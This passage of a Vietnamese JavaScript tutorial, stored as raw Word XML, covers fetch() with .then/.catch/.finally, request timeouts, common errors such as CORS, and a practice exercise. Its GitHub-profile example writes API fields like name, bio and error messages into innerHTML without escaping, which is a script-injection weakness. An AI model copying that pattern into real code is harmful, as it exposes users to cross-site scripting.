      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        .then((userData) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341603A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // 3. Render dữ liệu thành công ra màn hình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E157A7F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          resultContainer.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5909236A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            &lt;div class="user-card"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA08C13" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              &lt;img src="${userData.avatar_url}" alt="Avatar" width="80" style="border-radius: 50%;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A8455" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              &lt;h3&gt;${userData.name || userData.login}&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2352AB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              &lt;p&gt;${userData.bio || 'Chưa cập nhật tiểu sử.'}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38276741" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              &lt;p&gt;Kho lưu trữ công khai: &lt;strong&gt;${userData.public_repos}&lt;/strong&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB0F783" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521440B1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          `;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E02B9EA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A32A42" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        .catch((error) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039927AE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // 4. Bắt mọi lỗi xảy ra (lỗi mạng hoặc lỗi do throw new Error phía trên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259401E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          resultContainer.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A18A2AD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            &lt;div class="error-msg"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E259871" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              &lt;strong&gt;Đã xảy ra lỗi:&lt;/strong&gt; ${error.message}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63561FD5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A102716" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          `;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B868BB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3596C3F2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        .finally(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E7F7F9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // 5. Luôn luôn dọn dẹp trạng thái loading khi kết thúc tác vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2520FC3A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          statusContainer.innerHTML = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D78FEC7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D323F6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30175E06" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="0B7ED4DD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    btn.addEventListener('click', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8DD1B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      const username = input.value.trim();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E071ED7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      if (username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1236E344" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        fetchGitHubUser(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB97447" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAEBA10" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4924AB5D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECEE76D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029115DF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1300B440" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Ứng dụng trong thực tế (Real-world use case)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0FC37C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 1: Gửi Payload Dữ liệu Đăng Ký lên REST API (POST Request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB3A6D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Khi người dùng hoàn tất form đăng ký, ứng dụng không dùng cơ chế submit truyền thống (vốn làm tải lại cả trang), mà dùng fetch để gửi dữ liệu JSON kèm Token bảo mật:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D1AED" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334EB9D6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>fetch('/api/v1/auth/register', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3C0D82" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF36B8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E42DDB9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    'Content-Type': 'application/json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4640FAD7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    'Authorization': 'Bearer ' + token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E3F4E1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55362F5B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  body: JSON.stringify(formData)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC3AB2D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8A8D26" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tình huống 2: Thiết lập Giới hạn Thời gian Chờ Mạng (Request Timeout với AbortController):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155E6A9" w14:textId="09F802EF" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">Trong môi trường mạng di động chập chờn, nếu API bị treo, request có thể chờ vô hạn. Bằng việc kết hợp fetch() với đối tượng chuẩn AbortController(), lập trình viên có thể chủ động hủy kết nối nếu sau </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          </w:rPr>
          <m:t>5</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> giây máy chủ không phản hồi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377EC4E6" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15548DCA" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>const controller = new AbortController();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D036E0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>const timeoutId = setTimeout(() =&gt; controller.abort(), 5000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D62DEE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>fetch('/api/data', { signal: controller.signal })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACD548" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  .finally(() =&gt; clearTimeout(timeoutId));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497F127B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Lỗi thường gặp &amp; cách debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF4E508" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 1: Ảo tưởng rằng fetch() sẽ tự động nhảy vào .catch() khi gặp lỗi 404 hoặc 500:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10033069" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Server trả về 404 Not Found, nhưng code vẫn chạy vào khối .then(), lấy ra dữ liệu rỗng hoặc hiển thị giao diện vỡ toang thay vì hiện thông báo lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6564F114" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Luôn luôn viết kiểm tra điều kiện ngay ở .then() đầu tiên: if (!response.ok) throw new Error(...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C816A4C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 2: Quên từ khóa return trong bước phân tích response.json():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD7E43D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Viết mã dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645BD119" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31719D3A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>fetch(url)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA9782F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  .then(res =&gt; { res.json(); }) // Dùng ngoặc nhọn nhưng quên chữ return</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674932A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  .then(data =&gt; console.log(data)); // data bị in ra là undefined!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713EA844" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Dùng cú pháp arrow function rút gọn không ngoặc nhọn: .then(res =&gt; res.json()) hoặc viết tường minh: return res.json();.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCA3C35" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lỗi 3: Gặp lỗi CORS (Cross-Origin Resource Sharing) khi gọi API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68746856" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Nhận biết:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Console trình duyệt báo lỗi đỏ rực: Access to fetch at '[https://api.other.com](https://api.other.com)' from origin 'http://localhost:3000' has been blocked by CORS policy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D39617" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Cách sửa:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Hiểu rõ rằng CORS là </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cơ chế bảo mật của trình duyệt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>, KHÔNG PHẢI lỗi cú pháp JavaScript. Trình duyệt chặn lại vì máy chủ đích thiếu header phản hồi: Access-Control-Allow-Origin: *. Cách sửa chuẩn: Cấu hình CORS middleware trên Backend server (Node.js/Express) để cho phép domain frontend truy cập, hoặc thiết lập Reverse Proxy trong giai đoạn development.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5431CAF1" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Bài tập thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1543708C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề bài:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Viết một ứng dụng hiển thị một câu châm ngôn ngẫu nhiên (Random Quote Generator).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57415B0A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Sử dụng API công khai: [https://dummyjson.com/quotes/random](https://dummyjson.com/quotes/random).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E609C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Giao diện gồm: Một nút "Lấy câu mới", một khối hiển thị nội dung câu châm ngôn và tác giả.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCE935" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Hiển thị dòng chữ "Đang tải câu mới..." trong lúc chờ API.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB7A5C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Nếu người dùng ngắt kết nối mạng (thử nghiệm bằng cách bật Offline mode trong DevTools Network tab), phải bắt được lỗi và hiển thị: "Không có kết nối mạng, vui lòng thử lại!".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC1F424" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tiêu chí nghiệm thu (Acceptance Criteria):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFBEF4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Sử dụng thuần túy fetch(), .then(), .catch(), .finally().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190D611F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:t>Bắt buộc kiểm tra response.ok.</w:t>
      </w:r>
    </w:p>
